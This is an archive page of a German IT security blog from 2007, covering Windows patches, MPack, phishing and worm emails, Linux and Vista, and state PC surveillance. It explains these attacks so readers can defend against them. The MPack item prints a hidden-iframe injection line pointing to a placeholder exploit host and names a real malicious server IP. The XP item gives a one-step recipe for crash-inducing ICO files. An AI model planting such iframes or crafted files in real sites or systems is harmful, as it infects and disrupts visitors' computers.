Aktuelles Archiv 12 (IT-Blog von Thomas Murr)

Patch für Windows auf Rechnern mit Intel-Prozessoren (24.06.2007)

Mit dem Patch KB936357 für alle Windows-Editionen von XP (32-bit und x64-bit) , Vista (32-bit und 64-bit) und Server 2003 (32-bit und x64-bit) sollen lt. Microsoft die genannten Systeme auf Rechnern mit Intel-Prozessoren zuverlässiger laufen. Der Download des Patches erzwingt eine Gültigkeitsprüfung des installierten Systems über die WGA-Prüfung (Windows Genuine Advantage Tool) und ersetzt, nach Ausführung, die Datei <update.sys> im Verzeichnis <%\Windows\system32\drivers\>. Weitere Informationen sind derzeit von Microsoft nicht zu haben. Nach der Patch-Installation, ist ein Reboot des Systems erforderlich.

Web-Attack-Toolkit MPack (22.06.2007)

MPack ist ein sehr leistungsstarkes Hacker-Toolkit, stammt aus Russland und ist derzeit für 500-1.000 US-Dollar im Untergrund zu haben. Es beinhaltet gängige Exploits vergangener bzw. bekannter Sicherheitslücken zu den Browsern Internet Explorer, Firefox und Opera sowie für den Windows Media Player, den XML-Funktionen u.v.m..
Die Verbreitung, der über das Toolkit programmierten, Schädlinge erfolgt über gehackte Webserver bzw. manipulierte Webseiten, indem ein versteckter iFrame zum Einsatz kommt. Der ist für Administratoren von Internetseiten oft nur schwer zu finden und könnte beispielsweise so aussehen:
<IFRAME name=’StatPage’ src=’http://xxxxxxxx/’ width=5 height=5 style=’display:none’></IFRAME>

Besucht das Opfer eine so präparierte Website, holt sich der Browser über den versteckten iFrame weiteren Schadcode vom MPack-Server. Das Angiffspaket ist dabei in der Lage eine Analyse des angegriffenen Systems vorzunehmen, um automatisiert mit den entsprechenden Exploits über Sicherheitslücken in das System einzudringen. Anschliessend werden Tastatureingaben (z.B. Passwörter) geloggt und an den Angreifer übermittelt, ein Backdoor im System geöffnet (um den Rechner fernzusteuern) und weitere Trojaner mit weiteren Schadfunktionen (z.B. Online-Banking-Trojaner “Torpig”) nachgeladen.

Derzeit sind lt. Websense bereits mehrere 10.000 PC über einen gross angelegten Angriff infiziert. Die aktuell manipulierten Webserver (i.d.R. gewöhnliche Seiten im Touristik-, Hotel- und Autobereich) befinden sich hauptsächlich in Italien. Die befallenen PC laden sich derzeit Schadcode von einem MPackserver mit der IP-Adresse 64.38.33.13 nach. Anwendern ist zu empfehlen, diese Remote-IP-Adresse für den Zugriff auf allen TCP-/UDP- und ICMP-Ports über eine Firewall zu blocken.
Es werden jedoch massenhaft Angriffe auch von anderen MPack-Servern erwartet. Anwender sollten sich deshalb grundsätzlich mit den Risiken des Internets näher befassen, um sich adäquat und bestmöglich vor Angriffen schützen zu können (siehe nähere Details). Vor allem ist dem verwendeten Webbrowser und dessen installierten bzw. aktivierten Plugins (z.B. JavaScript, ActiveX etc.) grösste Beachtung zu schenken !

Webmaster von Internetseiten sollten Ihren Quellcode hinsichtlich o.a. IFrames untersuchen. Ein Auffinden solchen Codes sollte eine gründliche Untersuchung und Analyse der Sicherheitsmassnahmen zur Folge haben, damit über die offensichtlich vorhandene Sicherheitslücke nicht jederzeit wieder ein Hacker in den Webserver eindringen kann.

MS-Juni-Patchday: 15 Lücken geschlossen (13.06.2007)

Der Internet Explorer ist allein mit 6 gestopften Lücken betroffen, des weiteren wurden Fehler in Outlook Express und Windows Mail (Vista) sowie in Windows (nicht Vista) und MS-Office 2003 behoben. Microsoft räumt ein, dass es sich teilweise um kritische Fehler handelt, weshalb die Patches unbedingt installiert werden sollten. Nach Installation, ist ein Reboot des Systems fällig.
Die, im vorherigen Beitrag, erwähnten Schwachstellen wurden wie erwartet nicht behoben.

Windows XP: Zwei Fehler/Schwachstellen (11.06.2007)

Es handelt sich bei beiden Fehlern um Denial-of-Service-Schwachstellen in Windows XP SP2 (MS-Vista ist nicht betroffen).
Zum einen ein Fehler in der GDI-Komponente <gdiplus.dll>. Hierbei kommt es beim Zugriff auf eine präparierte ICO-Datei (zur Präparation genügt es bereits, den “InfoHeader Height” auf Null zu setzen) zum jeweiligen Absturz der jeweiligen Anwendung, die auf die Grafikbibliothek zurückgreift. Z.B. ist es nicht mehr möglich eine solche manipulierte ICO-Datei über den Windows-Explorer zu löschen, weil dieser bereits beim Öffnen des entsprechenden Verzeichnisses abstürzt. Sprich eine Löschung ist nur noch über die Eingabeaufforderung möglich.
Das zweite Problem betrifft symbolische oder referenzierende Links (Dateiendung .lnk), bei denen der Windows-Explorer beim Öffnen eines Verzeichnisses, welches solche aufeinander zeigende Links enthält, abstürzt. Liegt die entsprechende *.lnk-Datei auf dem Desktop, reicht schon das Booten des Systems, um den Windows-Explorer zum Absturz zu bringen. Hier hilft dann nur noch der abgesicherte Modus mit Eingabeaufforderung (Textmodus ohne graphische Oberfläche), um die präparierte Datei zu entfernen.

Einen Patch gibt es derzeit für beide Windows XP-Schwachstellen nicht. Ob diese mit einem Bugfix behoben werden, ist eher unwahrscheinlich. Viel eher ist zu erwarten, dass der Patch im kommenden Service Pack 3 für XP enthalten ist.

MS-Patchday: Viele sicherheitsrelevante Updates (09.05.2007)

Microsoft bietet am heutigen Patchday mehrere Updates für Windows (inkl. Internet Explorer), Office und weitere MS-Produkte an, die insgesamt 19 Sicherheitslücken schliessen. Nach Installation, ist ein Neustart des Systems fällig. Die Patches sollten dringend eingespielt werden.

Bundestrojaner-eMail und neue Sobervariante .AB (06.05.2007)

Aktuell ist eine Trojaner-eMail unterwegs, die dem Empfänger vorgaukelt, sein Computer sei im Visier der Fahnder und bereits mit dem Bundestrojaner indiziert worden. Die eMail mit gefälschtem Absender und dem Betreff “Aktenzeichen” (mit einer Zufallszahl versehen) enthält folgenden Text inkl. Schreibfehler:

“Sehr geehrter Internetnutzer,
im Rahmen unserer ständigen automatisierten Überprüfung von sogenannten Tauschbörsen im Internet, wurde folgende IP-Adresse auf unserem System ermittelt....Der Inhalt Ihres Rechners wurde als Beweismittel mittels den neuen Bundestrojaner sichergestellt. Es wird umgehend Anzeige gegen Sie erstatten, da sich illegale Software, Filme und/oder Musikdateien auf Ihren System befinden.”

Der eMail ist ein Anhang als Zip-Datei, die die Datei “Aktenzeichen.exe” enthält, beigefügt. Diese enthält dann den wirklichen Schädling, den viele Virenscanner trotz aktualisierter Virensignaturen nicht erkennen und somit auch nicht eliminieren können. Eine solche eMail sollte deshalb sofort ungeöffnet gelöscht werden.

--------------------------------------------------------------------------------------------------------------

Eine neue Sobervariante “Sober.AB” verbreitet sich derzeit ebenfalls per eMail-Anhang (in einer Zip-Datei versteckt) und gibt vor von Microsoft zu sein (die tatsächliche Absenderadresse ist wie immer gefälscht). Inhaltlich geht es entweder um eine Passwortänderung, eine Accounteinrichtung oder fehlerhafte Mailzustellung. Der Schädling, wurde er einmal ins Windows-System gelassen, terminiert Sicherheitsprogramme, lädt sich weitere Schädlinge aus dem Internet nach, verbreitet sich über eine eigene SMTP-Engine weiter sowie manipuliert die Registry.

Linux-Kernel 2.6.21 ist da (26.04.2007)

Der von Linus Torvalds neu freigegebene Linux-Kernel 2.6.21 beinhaltet einige Neuerungen. So wurde der High Resolution Timer integriert und zahlreiche Verbesserungen an den Kernel-based Virtual Machines (KVM) vorgenommen sowie das Virtual Machine Interface (VMI) von VMware aufgenommen. Das ACPI-Subsystem wurde umfangreich überarbeitet und es gab viele Änderungen im Treiber-Bereich.

Zum Thema Linux sehen Sie bitte auch unsere Seiten:

• parallele Linux-Installation (neben Windows)
• Linux-Partitionierungsbeispiel und Installation des Bootloaders
• Installation “AntiVir UNIX Workstation” unter Linux
• Linux kontra Windows: ein kleiner Vergleich

In eigener Sache: Wir sind umgezogen (20.04.2007)

Sie finden uns jetzt schräg gegenüber des bisherigen Domizils unter der Haus-Nr. 17 (siehe Impressum), sonst bleibt für Sie alles gleich (eMail-Adresse, Tel.-Nr. u.s.w.).

MS-Patchday: 4 Sicherheitsupdates für Windows XP (11.04.2007)

Am gestrigen Patchday wurden vier sicherheitsrelevante Updates von Microsoft für Windows XP bereitgestellt. Diese schliessen Sicherheitslücken, durch die ein Angreifer in das System eindringen und die Steuerung übernehmen könnte. U.a. wurden Fehler im Microsoft Agent und im Universellen Plug and Play sowie eine Sicherheitslücke im Windows-Kernel behoben. Die Installation der Updates ist dringend angeraten.

Microsoft: Patch für den Patch KB925902 (06.04.2007)

Die Windows XP-Probleme, die der ausserplanmässige Patch KB925902 vom 03.04.2007 mit der Steuersoftware “Elster” sowie auf Systemen mit Realtek-Soundchip verursachte, sind durch einen weiteren Patch KB935448 vom 05.04.2007 behoben worden. Das Update KB935448 für Windows XP kann auf dieser Microsoft-Seite heruntergeladen werden. Diese schnelle Reaktion von Microsoft ist erstaunlich wie zugleich erfreulich.

Für den kommenden, regulären Microsoft Patchday (10.04.2007) werden mehrere Windows-Updates erwartet, wobei mindestens eines davon eine sicherheitskritische Lücke schliessen soll. Die seit Wochen offene Word-Lücke wird voraussichtlich wieder nicht behoben sein.

MS-Sicherheitsupdate KB925902 verursacht Probleme mit “Elster”-Steuersoftware  (04.04.2007)

Das Update für Windows XP vom 03.04.2007 kann dazu führen, dass Programme nicht mehr funktionieren. Z.B. erscheint beim Start der aktuellen Finanzamt-Software “Elster” oder bei Systemen mit Realtek-Soundchip folgende Fehlermeldung:

“elfo<Jahr>.exe - Illegales Verschieben einer System-DLL
Die System-DLL “user32.dll” wurde im Speicher verschoben. Die Anwendung wird nicht einwandfrei ausgeführt. Die Datei wurde verschoben, da die DLL “C:\WINDOWS\system32\HHCTRL.OCX” einen Adressbereich belegt, der für Windows-System-Dlls reserviert ist. Besorgen Sie sich vom DLL-Lieferant eine neue DLL.”

Das Problem kann vorläufig nur wie folgt behoben werden:
1.Deaktivieren des “Automatisches Updates” (zu finden unter der Systemsteuerung): Dort ist vorläufig “Benachrichtigen, aber nicht automatsich downloaden oder installieren” zu aktivieren.
2. Vorläufiges Deinstallieren/Entfernen des Sicherheitsupdates KB925902 vom 03.04.2007 unter Software (Systemsteuerung). Um Updates zu sehen, muss dort ein Häkchen bei “Updates anzeigen” gesetzt sein.

Wenn der Patch für den Patch von Microsoft vorliegt (wir werden sofort berichten), sollte das Automatische Update wieder aktiviert sowie die letzten berichtigten Aktualisierungen installiert werden.

OpenOffice und Linux anstatt MS-Office und MS-Vista (04.04.2007)

“Microsoft Vista” (von Home-Premium bis Ultimate) haben wir mehrere Wochen eingehend getestet und kommen zu dem polemischen Schluss: Wer noch ein XP besitzt, verwende besser dies oder kaufe sich eines bzw. stelle auf eine Linux-Distribution um. Graphische Oberflächen unter Linux können übrigens schon lange, die von Microsoft zu Vista viel beworbenen, transparente Fensterchen anzeigen (auch in 3D)...Unseres Erachtens ist “Microsoft Vista” weder sicherheitstechnisch noch im Handling oder anderer Hinsicht eine Verbesserung, sondern vor allem im Hinblick auf den hardwaretechnischen Ressourcen-Hunger sogar eher eine Verschlechterung zum Windows-Vorgänger XP oder auch zu Vista vergleichbaren Linux-Distris.

Unser Fazit: Vista ist eine Enttäuschung und rechtfertigt das Anpreisen grossartiger Neuerungen nicht ! Mit aktuellen Linuxdistributionen wie Fedora Core, Ubuntu oder Suse-Linux kann Vista unserer Meinung nach leider nicht mithalten. Aber aufgrund der Marktüberlegenheit (z.B. Vertrieb neuer PC) wird Vista wohl die Zukunft gehören :’-(

Zu Linux oder auch Windows bietet sich die kostenlose Open-Source-Software Open-Office an. Eine wirkliche Alternative für private und vor allem geschäftliche Nutzung im Vergleich zur nicht gerade billigen MS-Office-Variante.

Neue Schwachstelle im Internet Explorer 7 (23.02.2007)

Der IE 7, installiert unter MS-XP oder MS-Vista, hat eine nicht zu unterschätzende Phishing-Lücke, sofern JavaScript aktiviert ist: Nach Besuch einer entsprechend manipulierten Internetseite, lädt der IE 7 - trotz manueller Eingabe der Adresse (URL) - gar eine völlig andere Webseite als in der Adresszeile angezeigt. Dies erleichtert Phishern natürlich erheblich die Arbeit. Testen kann man den Fehler auf dieser Demoseite des Entdeckers Michael Zalewski.
Ein Patch zur Schliessung der Lücke liegt noch nicht vor, so dass nur das Abschalten/Deaktivieren von JavaScript Schutz bietet. Grundsätzlich raten wir, mit Browser-Plugins grösste Vorsicht walten zu lassen.

Tutorial Installation AntiVir Workstation unter Linux (21.02.2007)

Aufgrund mehrfacher Bitten von Mitgliedern unseres mittlerweile geschlossenen Forums haben wir die Anleitung zur Installation der Antiviren-Software unter Linux (war ein Forumbeitrag von Thomas) wieder ins Netz gestellt. Wir hoffen den Linuxbegeisterten mit diesem Tutorial Licht ins Dunkel zu bringen. Von Rückfragen (eMails etc.) möchten wir jedoch absehen (sonst hätten wir das Forum bestehen lassen).

Neue Sicherheitslücke in Word (15.02.2007)

Glaubte man gestern noch, dass alle Sicherheitslecks mit den neuen Patches von Microsoft geschlossen wurden, taucht heute eine erneute Zero-Day-Lücke zu Word im Office-Paket 2000 und Office XP (Office 2003 und 2007 sowie der Word-Viewer sind scheinbar nicht betroffen) auf. Durch eine manipulierte Zeichenkette in einem .doc-Format lässt sich lt. Microsoft schädlicher Code in das System schleusen (siehe nähere Infos bei Microsoft).
Bis ein entsprechender Patch vorliegt, ist einmal mehr grösste Vorsicht beim Öffnen von fremden Word-Dokumenten geboten.

MS-Patchday: alle Lücken geschlossen (14.02.2007)

Mit dem heutigen Patchday wurden alle Schwachstellen in Windows und Office (auch die kritischen Lücken in Word) behoben. Die Patches sollten dringend über die Windows- und Office-Updateseite eingespielt werden.

Thema Online-Durchsuchung von PC (13.02.2007)

Der Bundesgerichtshof (BGH) hat den Beschluss des BGH-Ermittlungsrichters Ulrich Hebenstreit vom 25.11.2006, der die Unzulässigkeit von heimlichen Online-Durchsuchungen durch die Polizeibehörden und den Verfassungsschutz erklärte, am 31.01.2007 bestätigt (siehe Aktenzeichen StB 18/06 *). So ging die Generalbundesanwältin Monika Harms (als Speerspitze von Bundesinnenminister Schäuble) mit ihrer Beschwerde gegen diesen Beschluss glücklicherweise leer aus. Schäuble hat jedoch angekündigt, nun gesetzliche Grundlagen schaffen zu wollen, die eine heimliche Online-Durchsuchung von Bürger- und Unternehmens-PC durch den Staat vorbehaltlos über einen sog. Bundestrojaner ermöglichen soll. Dies käme sozusagen einer heimlichen Durchsuchung einer Wohnung oder von Geschäftsräumen gleich. Kurz gesagt, Schäuble möchte bewährte Gesetze, die die Privatsphäre des Bürgers bisher zuverlässig schützten, einfach fallen lassen und kurzerhand die Verfassung ändern. Das Motto: Passt das Urteil nicht, ändern man eben das Gesetz :-o
Die Argumentation, man müsse mit dem technischen Fortschritt Schritt halten, um Kriminelle (vor allem Terroristen) ausfindig zu machen, ist einfach lächerlich, um nicht zu sagen schwachsinnig ! Glaubt Schäuble denn tatsächlich so auch nur einen Terrorist zu überführen :-D ? Oder geht es gar um etwas anderes ? --> Stichwort “gläserner Bürger” und unersättlicher Datenhunger des Staates (erinnert alles sehr an “1984” von George Orwell).
Auch das Argument von vorhandenen Bombenanleitungen im Internet (O-Ton Schäuble: “Internet ist Fernuniversität und Trainingscamp für Terroristen”) geht komplett am Thema vorbei. Denn was hat das Internet mit einem lokalen Computer zu tun ? Hier reichen vorhandene Gesetze, die das Überwachen des Datenverkehrs über die Telefonleitung erlauben, völlig aus. Schäuble und BKA-Chef Ziercke, die beide versuchen mit Schwarzmalerei Sympathien für das Vorhaben und Ängste im Volk zu wecken, sind entweder selbst sog. DAU (Dümmste anzunehmende User) und “glänzen” mit Un- und Halbwissen oder argumentieren vorsätzlich mit nicht nachvollziehbaren Behauptungen.

Auf der einen Seite fordert der Staat Schutzmassnahmen gegen den Einsatz von Spionageprogrammen durch Wirtschaftskriminelle (z.B. verstärkt China derzeit immens die elektronische Spionage in deutschen Unternehmen) und möchte sich auf der anderen Seite der gleichen Softwarewanzen bedienen, um seine eigenen Bürger auszuspähen. In der Psychologie spricht man hier von schizophrenem Verhalten...

Sollte Schäuble mit seiner gewünschten Verfassungsänderung durchkommen, raten wir, Festplatteninhalte mit aktuellen kryptologischen Verfahren streng zu verschlüsseln, um private Daten vor unberechtigtem Zugriff zu schützen. Ferner sollte der eMail-Verkehr ebenso verschlüsselt erfolgen oder man bediene sich sogar zusätzlich der Steganographie, um selbst die Nachrichtenübermittlung an sich nicht erkennbar zu machen. Daran wird sich Schäuble bzw. seine neu gegründete Schnüfflertruppe/Hackerpolizei IMAS (Internet Monitoring und Analysestelle) die Zähne ausbeissen.
Diese Gegenmassnahmen sind auch nicht zuletzt deshalb wichtig, weil ein staatlich sanktioniertes Einfallstor auf lokale Computer auch von nichtstaatlichen Hackern ausgenutzt werden kann. Sprich es entsteht ein hausgemachter technischer Zielkonflikt. Der Berliner Datenschützer Alexander Dix spricht sogar von der Gefährdung der inneren Sicherheit.

Update 16.02.2007: Bundesjustizministerin Brigitte Zypries hat schwere rechtliche Bedenken gegen die heimliche Online-Durchsuchung geäussert und sieht keinen Zwang ein neues diesbzgl. Gesetz zu verabschieden. Auch meldete sich der Deutsche Anwaltsverein: “Staats-Hacking darf nicht legitimiert werden”

Siehe auch folgende Artikel zum Thema:
Trojaner demnächst vom Staat ? (08.10.2006)
Computer sollen ONLINE durchsucht werden können (08.12.2006)

*die Verlinkung zum Aktenzeichen haben wir uns vom BGH genehmigen lassen

zum Archiv11 (26.01.2007-16.10.2006)

Home | Angebot | IT-Forensik | IT-Risiken | WWW | Sicherheit | Tipps | Aktuelles | Kontakt | Links | Newsletter | AGB | Impressum | Sitemap |